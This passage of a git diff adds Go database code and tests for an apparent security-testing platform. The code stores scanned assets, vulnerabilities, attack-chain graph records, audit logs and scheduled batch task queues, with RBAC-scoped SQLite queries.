db.ListAssets(10, 0, AssetListFilter{}, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || len(assets) != 1 { + t.Fatalf("list assets: len=%d err=%v", len(assets), err) + } + conv, err := db.CreateConversation("asset scan", ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + if err := db.MarkAssetScanned(assets[0].ID, conv.ID, "", "", RBACListAccess{Scope: RBACScopeAll}); err != nil { + t.Fatal(err) + } + if _, err := db.CreateVulnerability(&Vulnerability{ConversationID: conv.ID, Title: "finding", Severity: "high", Target: "192.0.2.10"}); err != nil { + t.Fatal(err) + } + linked, err := db.GetAsset(assets[0].ID, RBACListAccess{Scope: RBACScopeAll}) + if err != nil { + t.Fatal(err) + } + if linked.LastScanAt == nil || linked.LastScanConversationID != conv.ID || linked.VulnerabilityCount != 1 || linked.RiskLevel != "high" { + t.Fatalf("unexpected scan metadata: %#v", linked) + } + vulns, err := db.ListVulnerabilities(10, 0, VulnerabilityListFilter{ConversationID: conv.ID}) + if err != nil || len(vulns) != 1 { + t.Fatalf("list linked vulnerabilities: len=%d err=%v", len(vulns), err) + } + vulns[0].Status = "fixed" + if err := db.UpdateVulnerability(vulns[0].ID, vulns[0]); err != nil { + t.Fatal(err) + } + resolved, err := db.GetAsset(assets[0].ID, RBACListAccess{Scope: RBACScopeAll}) + if err != nil { + t.Fatal(err) + } + if resolved.VulnerabilityCount != 1 || resolved.RiskLevel != "normal" { + t.Fatalf("resolved finding should remain in history without raising current risk: %#v", resolved) + } +} + +func TestAssetListFlexibleFiltersAndOldestScanPagination(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-query.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + assets := []*Asset{ + {IP: "192.0.2.1", Port: 443, Protocol: "https", Source: "fofa", Tags: []string{"prod"}}, + {IP: "192.0.2.2", Port: 80, Protocol: "http", Source: "manual", Tags: []string{"prod", "legacy"}}, + {Domain: "never.example.com", Port: 443, Protocol: "https", Source: "manual", Tags: []string{"prod"}}, + } + if _, err := db.UpsertAssets(assets, ""); err != nil { + t.Fatal(err) + } + old := time.Now().Add(-90 * 24 * time.Hour).UTC() + recent := time.Now().Add(-24 * time.Hour).UTC() + if _, err := db.Exec(`UPDATE assets SET last_scan_at=? WHERE id=?`, old, assets[0].ID); err != nil { + t.Fatal(err) + } + if _, err := db.Exec(`UPDATE assets SET last_scan_at=? WHERE id=?`, recent, assets[1].ID); err != nil { + t.Fatal(err) + } + + access := RBACListAccess{Scope: RBACScopeAll} + firstPage, total, err := db.ListAssets(2, 0, AssetListFilter{Tag: "prod", SortBy: "last_scan_at", SortOrder: "asc"}, access) + if err != nil || total != 3 || len(firstPage) != 2 { + t.Fatalf("oldest scan page: total=%d len=%d err=%v", total, len(firstPage), err) + } + if firstPage[0].ID != assets[2].ID || firstPage[0].LastScanAt != nil || firstPage[1].ID != assets[0].ID { + t.Fatalf("expected never-scanned then oldest scanned asset, got %#v", firstPage) + } + secondPage, _, err := db.ListAssets(2, 2, AssetListFilter{Tag: "prod", SortBy: "last_scan_at", SortOrder: "asc"}, access) + if err != nil || len(secondPage) != 1 || secondPage[0].ID != assets[1].ID { + t.Fatalf("unexpected second page: %#v err=%v", secondPage, err) + } + + never, total, err := db.ListAssets(20, 0, AssetListFilter{ScanState: "never"}, access) + if err != nil || total != 1 || len(never) != 1 || never[0].ID != assets[2].ID { + t.Fatalf("never-scanned filter: total=%d assets=%#v err=%v", total, never, err) + } + port := 443 + filtered, total, err := db.ListAssets(20, 0, AssetListFilter{Source: "fofa", Port: &port, LastScanBefore: &recent}, access) + if err != nil || total != 1 || len(filtered) != 1 || filtered[0].ID != assets[0].ID { + t.Fatalf("structured filters: total=%d assets=%#v err=%v", total, filtered, err) + } +} diff --git a/internal/database/attackchain.go b/internal/database/attackchain.go new file mode 100644 index 00000000..964cbfe4 --- /dev/null +++ b/internal/database/attackchain.go @@ -0,0 +1,167 @@ +package database + +import ( + "database/sql" + "encoding/json" + "fmt" + + "go.uber.org/zap" +) + +// AttackChainNode 攻击链节点 +type AttackChainNode struct { + ID string `json:"id"` + Type string `json:"type"` // tool, vulnerability, target, exploit + Label string `json:"label"` + ToolExecutionID string `json:"tool_execution_id,omitempty"` + Metadata map[string]interface{} `json:"metadata"` + RiskScore int `json:"risk_score"` +} + +// AttackChainEdge 攻击链边 +type AttackChainEdge struct { + ID string `json:"id"` + Source string `json:"source"` + Target string `json:"target"` + Type string `json:"type"` // leads_to, exploits, enables, depends_on + Weight int `json:"weight"` +} + +// SaveAttackChainNode 保存攻击链节点 +func (db *DB) SaveAttackChainNode(conversationID, nodeID, nodeType, nodeName, toolExecutionID, metadata string, riskScore int) error { + var toolExecID sql.NullString + if toolExecutionID != "" { + toolExecID = sql.NullString{String: toolExecutionID, Valid: true} + } + + var metadataJSON sql.NullString + if metadata != "" { + metadataJSON = sql.NullString{String: metadata, Valid: true} + } + + query := ` + INSERT OR REPLACE INTO attack_chain_nodes + (id, conversation_id, node_type, node_name, tool_execution_id, metadata, risk_score, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP) + ` + + _, err := db.Exec(query, nodeID, conversationID, nodeType, nodeName, toolExecID, metadataJSON, riskScore) + if err != nil { + db.logger.Error("保存攻击链节点失败", zap.Error(err), zap.String("nodeId", nodeID)) + return err + } + + return nil +} + +// SaveAttackChainEdge 保存攻击链边 +func (db *DB) SaveAttackChainEdge(conversationID, edgeID, sourceNodeID, targetNodeID, edgeType string, weight int) error { + query := ` + INSERT OR REPLACE INTO attack_chain_edges + (id, conversation_id, source_node_id, target_node_id, edge_type, weight, created_at) + VALUES (?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP) + ` + + _, err := db.Exec(query, edgeID, conversationID, sourceNodeID, targetNodeID, edgeType, weight) + if err != nil { + db.logger.Error("保存攻击链边失败", zap.Error(err), zap.String("edgeId", edgeID)) + return err + } + + return nil +} + +// LoadAttackChainNodes 加载攻击链节点 +func (db *DB) LoadAttackChainNodes(conversationID string) ([]AttackChainNode, error) { + query := ` + SELECT id, node_type, node_name, tool_execution_id, metadata, risk_score + FROM attack_chain_nodes + WHERE conversation_id = ? + ORDER BY created_at ASC, rowid ASC + ` + + rows, err := db.Query(query, conversationID) + if err != nil { + return nil, fmt.Errorf("查询攻击链节点失败: %w", err) + } + defer rows.Close() + + var nodes []AttackChainNode + for rows.Next() { + var node AttackChainNode + var toolExecID sql.NullString + var metadataJSON sql.NullString + + err := rows.Scan(&node.ID, &node.Type, &node.Label, &toolExecID, &metadataJSON, &node.RiskScore) + if err != nil { + db.logger.Warn("扫描攻击链节点失败", zap.Error(err)) + continue + } + + if toolExecID.Valid { + node.ToolExecutionID = toolExecID.String + } + + if metadataJSON.Valid && metadataJSON.String != "" { + if err := json.Unmarshal([]byte(metadataJSON.String), &node.Metadata); err != nil { + db.logger.Warn("解析节点元数据失败", zap.Error(err)) + node.Metadata = make(map[string]interface{}) + } + } else { + node.Metadata = make(map[string]interface{}) + } + + nodes = append(nodes, node) + } + + return nodes, nil +} + +// LoadAttackChainEdges 加载攻击链边 +func (db *DB) LoadAttackChainEdges(conversationID string) ([]AttackChainEdge, error) { + query := ` + SELECT id, source_node_id, target_node_id, edge_type, weight + FROM attack_chain_edges + WHERE conversation_id = ? + ORDER BY created_at ASC, rowid ASC + ` + + rows, err := db.Query(query, conversationID) + if err != nil { + return nil, fmt.Errorf("查询攻击链边失败: %w", err) + } + defer rows.Close() + + var edges []AttackChainEdge + for rows.Next() { + var edge AttackChainEdge + + err := rows.Scan(&edge.ID, &edge.Source, &edge.Target, &edge.Type, &edge.Weight) + if err != nil { + db.logger.Warn("扫描攻击链边失败", zap.Error(err)) + continue + } + + edges = append(edges, edge) + } + + return edges, nil +} + +// DeleteAttackChain 删除对话的攻击链数据 +func (db *DB) DeleteAttackChain(conversationID string) error { + // 先删除边(因为有外键约束) + _, err := db.Exec("DELETE FROM attack_chain_edges WHERE conversation_id = ?", conversationID) + if err != nil { + db.logger.Warn("删除攻击链边失败", zap.Error(err)) + } + + // 再删除节点 + _, err = db.Exec("DELETE FROM attack_chain_nodes WHERE conversation_id = ?", conversationID) + if err != nil { + db.logger.Error("删除攻击链节点失败", zap.Error(err), zap.String("conversationId", conversationID)) + return err + } + + return nil +} diff --git a/internal/database/audit.go b/internal/database/audit.go new file mode 100644 index 00000000..52a4146f --- /dev/null +++ b/internal/database/audit.go @@ -0,0 +1,222 @@ +package database + +import ( + "encoding/json" + "errors" + "strings" + "time" +) + +// AuditLog platform operation audit record. +type AuditLog struct { + ID string `json:"id"` + CreatedAt time.Time `json:"createdAt"` + Level string `json:"level"` + Category string `json:"category"` + Action string `json:"action"` + Result string `json:"result"` + Actor string `json:"actor"` + SessionHint string `json:"sessionHint,omitempty"` + ClientIP string `json:"clientIp,omitempty"` + UserAgent string `json:"userAgent,omitempty"` + ResourceType string `json:"resourceType,omitempty"` + ResourceID string `json:"resourceId,omitempty"` + ResourceAvailable *bool `json:"resourceAvailable,omitempty"` // API-only: whether linked resource still exists + Message string `json:"message"` + Detail map[string]interface{} `json:"detail,omitempty"` +} + +// ListAuditLogsFilter query parameters. +type ListAuditLogsFilter struct { + Actor string + Level string + Category string + Action string + Result string + Query string + ResourceType string + ResourceID string + RelatedUserID string + Since *time.Time + Until *time.Time + Limit int + Offset int +} + +func buildAuditLogsWhere(filter ListAuditLogsFilter) (string, []interface{}) { + conditions := []string{"1=1"} + args := []interface{}{} + if filter.Actor != "" { + conditions = append(conditions, "actor = ?") + args = append(args, filter.Actor) + } + if filter.Level != "" { + conditions = append(conditions, "level = ?") + args = append(args, filter.Level) + } + if filter.Category != "" { + conditions = append(conditions, "category = ?") + args = append(args, filter.Category) + } + if filter.Action != "" { + conditions = append(conditions, "action = ?") + args = append(args, filter.Action) + } + if filter.Result != "" { + conditions = append(conditions, "result = ?") + args = append(args, filter.Result) + } + if filter.ResourceType != "" { + conditions = append(conditions, "resource_type = ?") + args = append(args, filter.ResourceType) + } + if filter.ResourceID != "" { + conditions = append(conditions, "resource_id = ?") + args = append(args, filter.ResourceID) + } + if relatedUserID := strings.TrimSpace(filter.RelatedUserID); relatedUserID != "" { + conditions = append(conditions, `(resource_id = ? OR detail_json LIKE ? OR detail_json LIKE ?)`) + args = append(args, relatedUserID, `%"user_id":"`+relatedUserID+`"%`, `%"userId":"`+relatedUserID+`"%`) + } + if filter.Since != nil { + conditions = append(conditions, sqliteEpochGE("created_at", ">=")) + args = append(args, formatSQLiteUTC(*filter.Since)) + } + if filter.Until != nil { + conditions = append(conditions, sqliteEpochGE("created_at", "<=")) + args = append(args, formatSQLiteUTC(*filter.Until)) + } + if q := strings.TrimSpace(filter.Query); q != "" { + like := "%" + q + "%" + conditions = append(conditions, "(message LIKE ? OR resource_id LIKE ? OR action LIKE ? OR category LIKE ? OR detail_json LIKE ?)") + args = append(args, like, like, like, like, like) + } + return strings.Join(conditions, " AND "), args +} + +// AppendAuditLog inserts one audit row. +func (db *DB) AppendAuditLog(row *AuditLog) error { + if row == nil { + return errors.New("audit log is nil") + } + if strings.TrimSpace(row.ID) == "" { + return errors.New("audit id is required") + } + if row.CreatedAt.IsZero() { + row.CreatedAt = time.Now().UTC() + } else { + row.CreatedAt = row.CreatedAt.UTC() + } + if strings.TrimSpace(row.Level) == "" { + row.Level = "info" + } + detailJSON := "" + if len(row.Detail) > 0 { + if b, err := json.Marshal(row.Detail); err == nil { + detailJSON = string(b) + } + } + query := ` + INSERT INTO audit_logs ( + id, created_at, level, category, action, result, actor, session_hint, + client_ip, user_agent, resource_type, resource_id, message, detail_json + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, + row.ID, formatSQLiteUTC(row.CreatedAt), row.Level, row.Category, row.Action, row.Result, + row.Actor, row.SessionHint, row.ClientIP, row.UserAgent, + row.ResourceType, row.ResourceID, row.Message, detailJSON, + ) + return err +} + +// GetAuditLogByID returns one row. +func (db *DB) GetAuditLogByID(id string) (*AuditLog, error) { + id = strings.TrimSpace(id) + if id == "" { + return nil, errors.New("id is required") + } + query := ` + SELECT id, created_at, level, category, action, result, actor, + COALESCE(session_hint, ''), COALESCE(client_ip, ''), COALESCE(user_agent, ''), + COALESCE(resource_type, ''), COALESCE(resource_id, ''), message, COALESCE(detail_json, '') + FROM audit_logs WHERE id = ? + ` + var row AuditLog + var detailJSON string + err := db.QueryRow(query, id).Scan( + &row.ID, &row.CreatedAt, &row.Level, &row.Category, &row.Action, &row.Result, &row.Actor, + &row.SessionHint, &row.ClientIP, &row.UserAgent, + &row.ResourceType, &row.ResourceID, &row.Message, &detailJSON, + ) + if err != nil { + return nil, err + } + if detailJSON != "" { + _ = json.Unmarshal([]byte(detailJSON), &row.Detail) + } + return &row, nil +} + +// CountAuditLogs counts rows matching filter. +func (db *DB) CountAuditLogs(filter ListAuditLogsFilter) (int64, error) { + where, args := buildAuditLogsWhere(filter) + query := `SELECT COUNT(*) FROM audit_logs WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// ListAuditLogs lists audit rows newest first. +func (db *DB) ListAuditLogs(filter ListAuditLogsFilter) ([]*AuditLog, error) { + where, args := buildAuditLogsWhere(filter) + limit := filter.Limit + if limit <= 0 || limit > 500 { + limit = 50 + } + offset := filter.Offset + if offset < 0 { + offset = 0 + } + query := ` + SELECT id, created_at, level, category, action, result, actor, + COALESCE(session_hint, ''), COALESCE(client_ip, ''), COALESCE(user_agent, ''), + COALESCE(resource_type, ''), COALESCE(resource_id, ''), message, COALESCE(detail_json, '') + FROM audit_logs + WHERE ` + where + ` + ORDER BY created_at DESC + LIMIT ? OFFSET ? + ` + args = append(args, limit, offset) + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*AuditLog + for rows.Next() { + var row AuditLog + var detailJSON string + if err := rows.Scan( + &row.ID, &row.CreatedAt, &row.Level, &row.Category, &row.Action, &row.Result, &row.Actor, + &row.SessionHint, &row.ClientIP, &row.UserAgent, + &row.ResourceType, &row.ResourceID, &row.Message, &detailJSON, + ); err != nil { + continue + } + if detailJSON != "" { + _ = json.Unmarshal([]byte(detailJSON), &row.Detail) + } + list = append(list, &row) + } + return list, rows.Err() +} + +// DeleteAuditLogsBefore removes rows older than cutoff. +func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) { + res, err := db.Exec(`DELETE FROM audit_logs WHERE `+sqliteEpochGE("created_at", "<"), formatSQLiteUTC(cutoff)) + if err != nil { + return 0, err + } + return res.RowsAffected() +} diff --git a/internal/database/audit_time_test.go b/internal/database/audit_time_test.go new file mode 100644 index 00000000..8d350674 --- /dev/null +++ b/internal/database/audit_time_test.go @@ -0,0 +1,75 @@ +package database + +import ( + "os" + "path/filepath" + "strings" + "testing" + "time" + + "go.uber.org/zap" +) + +func TestBuildAuditLogsWhere_timeFilterSQL(t *testing.T) { + since := time.Date(2026, 6, 16, 17, 2, 0, 0, time.UTC) + until := time.Date(2026, 6, 17, 3, 3, 0, 0, time.UTC) + where, args := buildAuditLogsWhere(ListAuditLogsFilter{Since: &since, Until: &until}) + if !strings.Contains(where, "strftime('%s', created_at) >=") { + t.Fatalf("expected epoch comparison for since, got %q", where) + } + if !strings.Contains(where, "strftime('%s', created_at) <=") { + t.Fatalf("expected epoch comparison for until, got %q", where) + } + if len(args) != 2 { + t.Fatalf("expected 2 time args, got %d", len(args)) + } + for i, arg := range args { + s, ok := arg.(string) + if !ok || s == "" { + t.Fatalf("arg %d: want non-empty UTC RFC3339 string, got %v", i, arg) + } + } +} + +func TestBuildAuditLogsWhere_relatedUserID(t *testing.T) { + where, args := buildAuditLogsWhere(ListAuditLogsFilter{Category: "rbac", RelatedUserID: "user-123"}) + if !strings.Contains(where, "resource_id = ?") || !strings.Contains(where, "detail_json LIKE ?") { + t.Fatalf("expected related-user predicates, got %q", where) + } + if len(args) != 4 { + t.Fatalf("expected category plus 3 related-user args, got %#v", args) + } + if args[1] != "user-123" || args[2] != `%"user_id":"user-123"%` || args[3] != `%"userId":"user-123"%` { + t.Fatalf("unexpected related-user args: %#v", args) + } +} + +func TestListAuditLogs_timeFilterMixedStorageFormats(t *testing.T) { + root, err := os.Getwd() + if err != nil { + t.Skip(err) + } + dbPath := filepath.Join(root, "..", "..", "data", "conversations.db") + if _, err := os.Stat(dbPath); err != nil { + t.Skip("conversations.db not found") + } + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + since, _ := ParseRFC3339Time("2026-06-16T17:02:00Z") + until, _ := ParseRFC3339Time("2026-06-17T03:03:00Z") + filter := ListAuditLogsFilter{Since: &since, Until: &until, Limit: 50} + logs, err := db.ListAuditLogs(filter) + if err != nil { + t.Fatal(err) + } + for _, row := range logs { + at := row.CreatedAt.UTC() + if at.Before(since) || at.After(until) { + t.Fatalf("log %s at %s outside [%s, %s]", row.ID, at, since, until) + } + } +} diff --git a/internal/database/batch_task.go b/internal/database/batch_task.go new file mode 100644 index 00000000..0be6cac2 --- /dev/null +++ b/internal/database/batch_task.go @@ -0,0 +1,631 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" + "time" + + "go.uber.org/zap" +) + +// BatchTaskQueueRow 批量任务队列数据库行 +type BatchTaskQueueRow struct { + ID string + Title sql.NullString + Role sql.NullString + AgentMode sql.NullString + ScheduleMode sql.NullString + CronExpr sql.NullString + NextRunAt sql.NullTime + ScheduleEnabled sql.NullInt64 + LastScheduleTriggerAt sql.NullTime + LastScheduleError sql.NullString + LastRunError sql.NullString + ProjectID sql.NullString + Concurrency sql.NullInt64 + Status string + CreatedAt time.Time + StartedAt sql.NullTime + CompletedAt sql.NullTime + CurrentIndex int +} + +// BatchTaskRow 批量任务数据库行 +type BatchTaskRow struct { + ID string + QueueID string + Message string + ConversationID sql.NullString + Status string + StartedAt sql.NullTime + CompletedAt sql.NullTime + Error sql.NullString + Result sql.NullString +} + +// CreateBatchQueue 创建批量任务队列 +func (db *DB) CreateBatchQueue( + queueID string, + title string, + role string, + agentMode string, + scheduleMode string, + cronExpr string, + nextRunAt *time.Time, + projectID string, + concurrency int, + tasks []map[string]interface{}, +) error { + tx, err := db.Begin() + if err != nil { + return fmt.Errorf("开始事务失败: %w", err) + } + defer tx.Rollback() + + now := time.Now() + var nextRunAtValue interface{} + if nextRunAt != nil { + nextRunAtValue = *nextRunAt + } + + var projectIDVal interface{} + if strings.TrimSpace(projectID) != "" { + projectIDVal = strings.TrimSpace(projectID) + } + _, err = tx.Exec( + "INSERT INTO batch_task_queues (id, title, role, agent_mode, schedule_mode, cron_expr, next_run_at, schedule_enabled, project_id, concurrency, status, created_at, current_index) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", + queueID, title, role, agentMode, scheduleMode, cronExpr, nextRunAtValue, 1, projectIDVal, concurrency, "pending", now, 0, + ) + if err != nil { + return fmt.Errorf("创建批量任务队列失败: %w", err) + } + + // 插入任务 + for _, task := range tasks { + taskID, ok := task["id"].(string) + if !ok { + continue + } + message, ok := task["message"].(string) + if !ok { + continue + } + + _, err = tx.Exec( + "INSERT INTO batch_tasks (id, queue_id, message, status) VALUES (?, ?, ?, ?)", + taskID, queueID, message, "pending", + ) + if err != nil { + return fmt.Errorf("创建批量任务失败: %w", err) + } + } + + return tx.Commit() +} + +const batchQueueSelectColumns = `id, title, role, agent_mode, schedule_mode, cron_expr, next_run_at, schedule_enabled, last_schedule_trigger_at, last_schedule_error, last_run_error, project_id, concurrency, status, created_at, started_at, completed_at, current_index` + +// GetBatchQueue 获取批量任务队列 +func (db *DB) GetBatchQueue(queueID string) (*BatchTaskQueueRow, error) { + var row BatchTaskQueueRow + var createdAt string + err := db.QueryRow( + "SELECT "+batchQueueSelectColumns+" FROM batch_task_queues WHERE id = ?", + queueID, + ).Scan(&row.ID, &row.Title, &row.Role, &row.AgentMode, &row.ScheduleMode, &row.CronExpr, &row.NextRunAt, &row.ScheduleEnabled, &row.LastScheduleTriggerAt, &row.LastScheduleError, &row.LastRunError, &row.ProjectID, &row.Concurrency, &row.Status, &createdAt, &row.StartedAt, &row.CompletedAt, &row.CurrentIndex) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, fmt.Errorf("查询批量任务队列失败: %w", err) + } + + parsedTime, parseErr := time.Parse("2006-01-02 15:04:05", createdAt) + if parseErr != nil { + // 尝试其他时间格式 + parsedTime, parseErr = time.Parse(time.RFC3339, createdAt) + if parseErr != nil { + db.logger.Warn("解析创建时间失败", zap.String("createdAt", createdAt), zap.Error(parseErr)) + parsedTime = time.Now() + } + } + row.CreatedAt = parsedTime + return &row, nil +} + +// GetAllBatchQueues 获取所有批量任务队列 +func (db *DB) GetAllBatchQueues() ([]*BatchTaskQueueRow, error) { + rows, err := db.Query( + "SELECT " + batchQueueSelectColumns + " FROM batch_task_queues ORDER BY created_at DESC", + ) + if err != nil { + return nil, fmt.Errorf("查询批量任务队列列表失败: %w", err) + } + defer rows.Close() + + var queues []*BatchTaskQueueRow + for rows.Next() { + var row BatchTaskQueueRow + var createdAt string + if err := rows.Scan(&row.ID, &row.Title, &row.Role, &row.AgentMode, &row.ScheduleMode, &row.CronExpr, &row.NextRunAt, &row.ScheduleEnabled, &row.LastScheduleTriggerAt, &row.LastScheduleError, &row.LastRunError, &row.ProjectID, &row.Concurrency, &row.Status, &createdAt, &row.StartedAt, &row.CompletedAt, &row.CurrentIndex); err != nil { + return nil, fmt.Errorf("扫描批量任务队列失败: %w", err) + } + parsedTime, parseErr := time.Parse("2006-01-02 15:04:05", createdAt) + if parseErr != nil { + parsedTime, parseErr = time.Parse(time.RFC3339, createdAt) + if parseErr != nil { + db.logger.Warn("解析创建时间失败", zap.String("createdAt", createdAt), zap.Error(parseErr)) + parsedTime = time.Now() + } + } + row.CreatedAt = parsedTime + queues = append(queues, &row) + } + + return queues, nil +} + +// ListBatchQueues 列出批量任务队列(支持筛选和分页) +func (db *DB) ListBatchQueues(limit, offset int, status, keyword string) ([]*BatchTaskQueueRow, error) { + return db.ListBatchQueuesForAccess(limit, offset, status, keyword, "", "") +} + +func (db *DB) ListBatchQueuesForAccess(limit, offset int, status, keyword, userID, scope string) ([]*BatchTaskQueueRow, error) { + query := "SELECT " + batchQueueSelectColumns + " FROM batch_task_queues WHERE 1=1" + args := []interface{}{} + + // 状态筛选 + if status != "" && status != "all" { + query += " AND status = ?" + args = append(args, status) + } + + // 关键字搜索(搜索队列ID和标题) + if keyword != "" { + query += " AND (id LIKE ? OR title LIKE ?)" + args = append(args, "%"+keyword+"%", "%"+keyword+"%") + } + userID = strings.TrimSpace(userID) + if userID != "" && scope != RBACScopeAll { + query += ` AND ( + owner_user_id = ? + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'batch_task' AND ra.resource_id = batch_task_queues.id + ) + OR ( + project_id IS NOT NULL AND project_id <> '' AND ( + EXISTS (SELECT 1 FROM projects p WHERE p.id = batch_task_queues.project_id AND p.owner_user_id = ?) + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments pra + WHERE pra.user_id = ? AND pra.resource_type = 'project' AND pra.resource_id = batch_task_queues.project_id + ) + ) + ) + )` + args = append(args, userID, userID, userID, userID) + } + + query += " ORDER BY created_at DESC LIMIT ? OFFSET ?" + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("查询批量任务队列列表失败: %w", err) + } + defer rows.Close() + + var queues []*BatchTaskQueueRow + for rows.Next() { + var row BatchTaskQueueRow + var createdAt string + if err := rows.Scan(&row.ID, &row.Title, &row.Role, &row.AgentMode, &row.ScheduleMode, &row.CronExpr, &row.NextRunAt, &row.ScheduleEnabled, &row.LastScheduleTriggerAt, &row.LastScheduleError, &row.LastRunError, &row.ProjectID, &row.Concurrency, &row.Status, &createdAt, &row.StartedAt, &row.CompletedAt, &row.CurrentIndex); err != nil { + return nil, fmt.Errorf("扫描批量任务队列失败: %w", err) + } + parsedTime, parseErr := time.Parse("2006-01-02 15:04:05", createdAt) + if parseErr != nil { + parsedTime, parseErr = time.Parse(time.RFC3339, createdAt) + if parseErr != nil { + db.logger.Warn("解析创建时间失败", zap.String("createdAt", createdAt), zap.Error(parseErr)) + parsedTime = time.Now() + } + } + row.CreatedAt = parsedTime + queues = append(queues, &row) + } + + return queues, nil +} + +// CountBatchQueues 统计批量任务队列总数(支持筛选条件) +func (db *DB) CountBatchQueues(status, keyword string) (int, error) { + return db.CountBatchQueuesForAccess(status, keyword, "", "") +} + +func (db *DB) CountBatchQueuesForAccess(status, keyword, userID, scope string) (int, error) { + query := "SELECT COUNT(*) FROM batch_task_queues WHERE 1=1" + args := []interface{}{} + + // 状态筛选 + if status != "" && status != "all" { + query += " AND status = ?" + args = append(args, status) + } + + // 关键字搜索(搜索队列ID和标题) + if keyword != "" { + query += " AND (id LIKE ? OR title LIKE ?)" + args = append(args, "%"+keyword+"%", "%"+keyword+"%") + } + userID = strings.TrimSpace(userID) + if userID != "" && scope != RBACScopeAll { + query += ` AND ( + owner_user_id = ? + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'batch_task' AND ra.resource_id = batch_task_queues.id + ) + OR ( + project_id IS NOT NULL AND project_id <> '' AND ( + EXISTS (SELECT 1 FROM projects p WHERE p.id = batch_task_queues.project_id AND p.owner_user_id = ?) + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments pra + WHERE pra.user_id = ? AND pra.resource_type = 'project' AND pra.resource_id = batch_task_queues.project_id + ) + ) + ) + )` + args = append(args, userID, userID, userID, userID) + } + + var count int + err := db.QueryRow(query, args...).Scan(&count) + if err != nil { + return 0, fmt.Errorf("统计批量任务队列总数失败: %w", err) + } + + return count, nil +} + +// GetBatchTasks 获取批量任务队列的所有任务 +func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) { + rows, err := db.Query( + "SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY rowid ASC", + queueID, + ) + if err != nil { + return nil, fmt.Errorf("查询批量任务失败: %w", err) + } + defer rows.Close() + + var tasks []*BatchTaskRow + for rows.Next() { + var task BatchTaskRow + if err := rows.Scan( + &task.ID, &task.QueueID, &task.Message, &task.ConversationID, + &task.Status, &task.StartedAt, &task.CompletedAt, &task.Error, &task.Result, + ); err != nil { + return nil, fmt.Errorf("扫描批量任务失败: %w", err) + } + tasks = append(tasks, &task) + } + + return tasks, nil +} + +// UpdateBatchQueueStatus 更新批量任务队列状态 +func (db *DB) UpdateBatchQueueStatus(queueID, status string) error { + var err error + now := time.Now() + + if status == "running" { + _, err = db.Exec( + "UPDATE batch_task_queues SET status = ?, started_at = COALESCE(started_at, ?) WHERE id = ?", + status, now, queueID, + ) + } else if status == "completed" || status == "cancelled" { + _, err = db.Exec( + "UPDATE batch_task_queues SET status = ?, completed_at = COALESCE(completed_at, ?) WHERE id = ?", + status, now, queueID, + ) + } else { + _, err = db.Exec( + "UPDATE batch_task_queues SET status = ? WHERE id = ?", + status, queueID, + ) + } + + if err != nil { + return fmt.Errorf("更新批量任务队列状态失败: %w", err) + } + return nil +} + +// UpdateBatchTaskStatus 更新批量任务状态 +func (db *DB) UpdateBatchTaskStatus(queueID, taskID, status string, conversationID, result, errorMsg string) error { + var err error + now := time.Now() + + // 构建更新语句 + var updates []string + var args []interface{} + + updates = append(updates, "status = ?") + args = append(args, status) + + if conversationID != "" { + updates = append(updates, "conversation_id = ?") + args = append(args, conversationID) + } + + if result != "" { + updates = append(updates, "result = ?") + args = append(args, result) + } + + if errorMsg != "" { + updates = append(updates, "error = ?") + args = append(args, errorMsg) + } + + if status == "running" { + updates = append(updates, "started_at = COALESCE(started_at, ?)") + args = append(args, now) + } + + if status == "completed" || status == "failed" || status == "cancelled" { + updates = append(updates, "completed_at = COALESCE(completed_at, ?)") + args = append(args, now) + } + + args = append(args, queueID, taskID) + + // 构建SQL语句 + sql := "UPDATE batch_tasks SET " + for i, update := range updates { + if i > 0 { + sql += ", " + } + sql += update + } + sql += " WHERE queue_id = ? AND id = ?" + + _, err = db.Exec(sql, args...) + if err != nil { + return fmt.Errorf("更新批量任务状态失败: %w", err) + } + return nil +} + +// UpdateBatchQueueCurrentIndex 更新批量任务队列的当前索引 +func (db *DB) UpdateBatchQueueCurrentIndex(queueID string, currentIndex int) error { + _, err := db.Exec( + "UPDATE batch_task_queues SET current_index = ? WHERE id = ?", + currentIndex, queueID, + ) + if err != nil { + return fmt.Errorf("更新批量任务队列当前索引失败: %w", err) + } + return nil +} + +// UpdateBatchQueueMetadata 更新批量任务队列标题、角色、代理模式和并发数 +func (db *DB) UpdateBatchQueueMetadata(queueID, title, role, agentMode string, concurrency int) error { + _, err := db.Exec( + "UPDATE batch_task_queues SET title = ?, role = ?, agent_mode = ?, concurrency = ? WHERE id = ?", + title, role, agentMode, concurrency, queueID, + ) + if err != nil { + return fmt.Errorf("更新批量任务队列元数据失败: %w", err) + } + return nil +} + +// UpdateBatchQueueSchedule 更新批量任务队列调度相关信息 +func (db *DB) UpdateBatchQueueSchedule(queueID, scheduleMode, cronExpr string, nextRunAt *time.Time) error { + var nextRunAtValue interface{} + if nextRunAt != nil { + nextRunAtValue = *nextRunAt + } + _, err := db.Exec( + "UPDATE batch_task_queues SET schedule_mode = ?, cron_expr = ?, next_run_at = ? WHERE id = ?", + scheduleMode, cronExpr, nextRunAtValue, queueID, + ) + if err != 